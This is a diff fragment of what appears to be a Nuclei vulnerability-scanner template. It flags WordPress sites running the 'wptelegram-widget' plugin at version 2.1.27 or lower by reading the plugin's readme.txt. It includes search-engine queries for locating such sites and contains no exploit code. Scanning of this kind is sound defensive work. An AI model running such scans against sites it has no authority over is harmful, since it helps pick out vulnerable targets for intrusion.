+ fofa-query: "wp-content/plugins/wptelegram-widget/"
+ google-query: inurl:"/wp-content/plugins/wptelegram-widget/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wptelegram-widget,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wptelegram-widget/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wptelegram-widget"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.27')
\ No newline at end of file